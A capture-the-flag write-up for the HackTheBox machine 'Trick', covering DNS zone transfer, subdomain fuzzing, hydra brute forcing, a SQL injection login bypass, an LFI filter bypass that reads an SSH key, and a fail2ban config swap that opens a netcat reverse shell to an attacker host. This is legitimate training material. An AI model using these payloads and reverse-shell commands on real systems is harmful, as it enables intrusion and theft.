Trick

Personal Rating: Medium

Enumeration

A more extensive nmap scan reveals interesting insights:

sudo nmap -A -p- -v <IP>

Discovered open port 80/tcp on 10.10.11.166
Discovered open port 53/tcp on 10.10.11.166
Discovered open port 22/tcp on 10.10.11.166
Discovered open port 25/tcp on 10.10.11.166

53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian

Host script results:
| dns-blacklist: 
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
|_dns-brute: Can't guess domain of "10.10.11.166"; use dns-brute.domain script argument.

So a DNS server is running on the box!

DNS AXFR Zone Transfer

I found a web server on port 80, but was stuck there right at the beginning. After checking the forum I found out that you had to guess the domain trick.htb. I added it to my hosts file and the IP to my resolv.conf as DNS server. Then I could perform an AXFR zone transfer for the domain trick.htb with the box as DNS server:

dig -t axfr @10.10.11.166 trick.htb
; <<>> DiG 9.18.4 <<>> -t axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 86 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Sat Jul 09 01:58:08 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)

root.trick.htb seemed the same as 10.10.11.166:80, but preprod-payroll.trick.htb showed a PHP login page.

Fuzzing the pages I found revealed some PHP files, most of which were not of interest though.

At users.php I found a supposed administrator with the username Enemigosss.

I started an SSH brute force against that user with hydra, but to no avail:

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt preprod-payroll.trick.htb http-post-form "/ajax.php:username=^USER^&password=^PASS^&Login:Login failed, invalid username or password!" -V

I once again had to consult the forum and found out that you should find a third subdomain by guessing. I fuzzed for preprod-FUZZ.trick.htb and found preprod-marketing.trick.htb.

The SMTP port was a rabbit hole, by the way. I could enumerate users by connecting to the port with telnet, but nothing special was possible. Another way would have been hydra:

hydra smtp-enum://trick.htb:25/rcpt -L "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -p localhost

Manual SQLi

At http://preprod-marketing.trick.htb/login.php I performed some LFI testing and fuzzing, but didn't really find anything. The login page was susceptible to SQL injection, though. After some testing I found this to be a working payload:

x' OR '1' = '1'-- -

LFI w/ Filter Bypass

On the authenticated page, an LFI was possible:

....//....//....//etc/passwd

As seen, a simple WAF evasion was necessary. Through the same LFI vulnerability I could then also read the SSH key of the user michael:

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
<SNIP>
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

Fail2ban SUID Exploit

sudo -l reveals something:

(root) NOPASSWD: /etc/init.d/fail2ban restart

The id command also showed that the user was a member of the security group. I searched for files belonging to that group and found the directory /etc/fail2ban/action.d with root:security ownership.

The given permissions allow removing iptables-multiport.conf and replacing it with a custom one that executes /bin/nc ATTACKERIP 4444 -e /bin/bash whenever someone gets banned. The config file is reset by a cron job every two minutes, and I have to send many requests in a short period of time to get banned, so I automated both with a bash script on the target and hydra on my machine:

rm /etc/fail2ban/action.d/iptables-multiport.conf
cp /home/michael/temp /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
nc -lnvp 4444
hydra -I -l root -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt <TARGETIP> -v ssh

Finding the corresponding config file and working out what it does under which conditions was hard for me. I must say I really disliked the fact that you had to guess domains here. But during a real external pentest this might be required and more obvious, so I should expect it next time.
